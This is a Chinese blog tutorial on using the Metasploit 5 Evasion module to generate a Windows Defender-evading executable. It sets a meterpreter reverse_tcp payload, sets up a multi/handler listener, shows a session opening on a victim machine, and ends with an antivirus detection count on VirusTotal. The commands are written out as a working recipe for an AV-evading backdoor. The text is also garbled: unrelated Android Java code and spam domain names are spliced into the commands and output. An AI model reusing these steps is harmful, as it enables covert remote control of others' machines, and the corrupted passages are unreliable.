简介
  
  几天前我说了kali这次更新我最关心的是metasploit升级到了5.0,5.0中有一个新的模块叫Evasion模块,这个模块可以轻松的创建反杀毒软件的木马,今天我们就来试一试
  
  操作
  
  首先打开metasploit
  
  msfconsole
  
  你会看到下面这个界面
  
  ➜ ~ msfconsole
  
  This copy of metasploit-framework is more than two weeks old.
  
  Consider running 'msfupdate' to update to the latest version.
  
  .:okOOOkdc' 'cdkOOOko:.
  
  .xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
  
  :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
  
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
  
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
  
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
  
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
  
  cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
  
  oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
  
  lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
  
  ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
  
  .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
  
  ,kOl'M.OOOOOOOOOOOOO.M'dOk,
  
  :kk;.OOOOOOOOOOOOO.;Ok:
  
  ;kOOOOOOOOOOOOOOOk:
  
  ,xOOOOOOOOOOOx,
  
  .lOOOOOOOl.
  
  ,dOd,
  
  .
  
  =[ metasploit v5.0.2-dev-c808cbe0509d4e8819879c6e1ed8bda45c34a19f]
  
  + -- --=[ 1851 exploits - 1046 auxiliary - 321 post ]
  
  + -- --=[ 541 payloads - 44 encoders - 10 nops ]
  
  + -- --=[ 2 evasion ]
  
  + -- --=[ ** This is Metasploit 5 development branch ** ]
  
  之后使用evasion模块,首先看看有什么evasion模块
  
  msf5 > show evasion
  
  evasion
  
  =======
  
  Name Disclosure Date Rank Check Description
  
  ---- --------------- ---- ----- -----------
  
  windows/windows_defender_exe normal No Microsoft Windows Defender Evasive Executable
  
  windows/windows_defender_js_hta normal No Microsoft Windows Defender Evasive JS.Net and HTA
  
  使用windows/windows_defender_exe这个模块
  
  use windows/windows_defender_exe
  
  查看要配置的参数
  
  show options
  
  msf5 evasion(windows/windows_defender_exe) > show options
  
  Module options (evasion/windows/windows_defender_exe):
  
  Name Current Setting Required Description
  
  ---- --------------- -------- -----------
  
  FILENAME oDlIipoP.exe yes Filename for the evasive file (default: random)
  
  Evasion target:
  
  Id Name
  
  @Override
  
  public void onReceive(Context content, Intent intent)
  
  {
  
  String action=intent.getAction(www.dfgjpt.com);
  
  if (actionName.equals(action))
  
  {
  
  String msg=intent.getStringExtra("content");
  
  Toast.makeText(getApplicationContext(www.yongshi123.cn),msg,Toast.LENGTH_SHORT).show();
  
  http://dasheng178.com/#portal/list.html
  
  Intent inten = new Intent("android.intent.action.MAIN");
  
  inten.setComponent(new ComponentName(www.hengtongyoule.com getApplicationContext().getPackageName(), Main2Activity.class.getName()));
  
  intent.addFlags(Intent.FLAG_ACTIVITY_REORDER_TO_FRONT
  
  | Intent.FLAG_ACTIVITY_NEW_TASK
  
  | Intent.FLAG_ACTIVITY_RESET_TASK_IF_NEEDED);
  
  getApplicationContext().startActivity(inten);
  
  }
  
  0 Microsoft Windows
  
  就一个文件名参数可以配置
  
  set FILENAME bboysoul.exe
  
  之后使用reverse_www.dasheng178.com tcp payload
  
  set payload windows/meterpreter/reverse_tcp
  
  设置端口和ip
  
  set LHOST 10.10.10.186
  
  set LPORT 4444
  
  生成木马文件
  
  exploit
  
  之后打开一个监听端口
  
  use multi/handler
  
  设置payload
  
  set payload windows/meterpreter/reverse_tcp
  
  设置主机和端口
  
  set LHOST 10.10.10.186
  
  set LPORT 4444
  
  执行
  
  exploit
  
  接着我们把生成出来的木马在远端要被控制的windows机器上运行我们这里就可以接收到这个回话了
  
  msf5 exploit(multi/handler)www.ysgptvip.com > exploit
  
  [*] Started reverse TCP handler on 10.10.10.186:4444
  
  ^@[*] Sending stage (179779 bytes) to 10.10.10.167
  
  [*] Meterpreter session 1 opened www.meiwanyule.cn/ (10.10.10.186:4444 -> 10.10.10.167:52882) at 2019-02-23 13:37:14 +0800
  
  上面都是常规操作,之后我们扫描病毒
  
  打开
  
  www.virustotal.com
  
  放入文件扫描
  
  只有33个病毒引擎扫描出来了,说明还可以

使用metasploit中Evasion模块的更多相关文章

  1. Metasploit渗透测试模块(一)

    1.Metasploit模块加载 初始化界面,成功要加载数据库 查看 Metasploit中已近存在的漏洞模块使用 show payloads

  2. metasploit 中的DB

    渗透测试任务中,主机/服务/漏洞等信息如果手动维护,会带来巨大的工作量. 在metasploit中,这部分工作已经被封装的非常好,每次调用内部模块执行的任务结果都会自动存入DB.通过简单的指令即可以方 ...

  3. Kail Linux渗透测试教程之在Metasploit中扫描

    Kail Linux渗透测试教程之在Metasploit中扫描 在Metasploit中扫描 在Metasploit中,附带了大量的内置扫描器.使用这些扫描器可以搜索并获得来自一台计算机或一个完整网络 ...

  4. Metasploit自动攻击模块

    Metasploit自动攻击模块 Usage: db_autopwn [options] -h Display this help text -t Show all matching exploit ...

  5. 了解Metasploit中的Payloads(有效载荷)

    什么是payload? payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等.也有人把payloads称 为shellcode. Shellco ...

  6. 【逆向&编程实战】Metasploit中的安卓载荷凭什么吊打SpyNote成为安卓端最强远控

    文章作者:MG1937 QQ:3496925334 CNBLOG:ALDYS4 未经许可,禁止转载 前言 说起SpyNote大家自然不陌生,这款恶意远控软件被利用在各种攻击场景中 甚至是最近也捕获到了 ...

  7. 隐藏进程中的模块绕过IceSword的检测

    标 题: [原创] 隐藏进程中的模块绕过IceSword的检测 作 者: xPLK 时 间: 2008-06-19,17:59:11 链 接: http://bbs.pediy.com/showthr ...

  8. 浅析JS中的模块规范(CommonJS,AMD,CMD)////////////////////////zzzzzz

    浅析JS中的模块规范(CommonJS,AMD,CMD)   如果你听过js模块化这个东西,那么你就应该听过或CommonJS或AMD甚至是CMD这些规范咯,我也听过,但之前也真的是听听而已.     ...

  9. 解决centos7中python-pip模块不存在的问题

    centos 7中python-pip模块不存在,是因为像centos这类衍生的发行版,源跟新滞后,或者不存在.即使使用yum去search python-pip也找不到软件包. 为了使用安装滞后或源 ...

随机推荐

  1. Nowcoder186C 失衡天平 背包

    题目传送门 题意:给你$N$个数,你可以将其划分为若干对集合(这里所说的集合允许数字重复)(即集合是两个集合两个集合出现),每对集合中两个集合所有元素的和的差的绝对值不超过$M$,可以有数字不在集合内 ...

  2. Vue-Vue组件的注册和使用

    全局注册: 要注册一个全局组件,可以使用 Vue.component(tagName, options). 注意确保在初始化根实例之前注册组件: html代码: <div id="ex ...

  3. C#批量插入数据到Sqlserver中的四种方式 - 转

    先创建一个用来测试的数据库和表,为了让插入数据更快,表中主键采用的是GUID,表中没有创建任何索引.GUID必然是比自增长要快的,因为你生成一个GUID算法所花的时间肯定比你从数据表中重新查询上一条记 ...

  4. 给 MSYS2 添加中科大的源

    最近一段时间不知怎么的,使用默认的 MSYS2 源升级软件或是安装新软件的特别的慢.所以就翻了翻国内的几个开源软件的镜像库,发现中科大的库里就有 MSYS2.所以就研究了一下,给 MSYS2 添加了中 ...

  5. Verilog设计异步FIFO

    转自http://ninghechuan.com 异步FIFO有两个异步时钟,一个端口写入数据,一个端口读出数据.通常被用于数据的跨时钟域的传输. 同步FIFO的设计.一个时钟控制一个计数器,计数器增 ...

  6. ABP+AdminLTE+Bootstrap Table权限管理系统第六节--abp控制器扩展及json封装以及6种处理时间格式化的方法

    返回总目录:ABP+AdminLTE+Bootstrap Table权限管理系统一期 一,控制器AbpController 说完了Swagger ui 我们再来说一下abp对控制器的处理和json的封 ...

  7. ceph学习

    网络: ceph必须要有公共网络和集群网络: public network:负责客户端交互以及osd与mon之间的通讯 cluster network:负责osd之间的复制,均衡,回填,数据恢复等操作 ...

  8. webvirtmgr-重命名kvm虚拟机的名称

    之前部署了Webvirtmgr平台管理kvm虚拟机,由于虚拟机在创建时名称是顺便起的,后续在虚拟机上部署了部分业务.为了便于管理,最好将虚拟机的名称重置下. 现在说下如何修改kvm中虚拟机的名称: 比 ...

  9. squid代理http和https方式上网的操作记录

    需求说明:公司IDC机房有一台服务器A,只有内网环境:192.168.1.150现在需要让这台服务器能对外访问,能正常访问http和https请求(即80端口和443端口)操作思路:在IDC机房里另找 ...

  10. HTTP协议基础与web服务的重定向,跳转以及请求转发

    JavaWeb中,HttpServletRequest与HttpServletResponse几乎是处理各种请求与操作必备的参数,与原始的ServletRequest/ServletResponse相 ...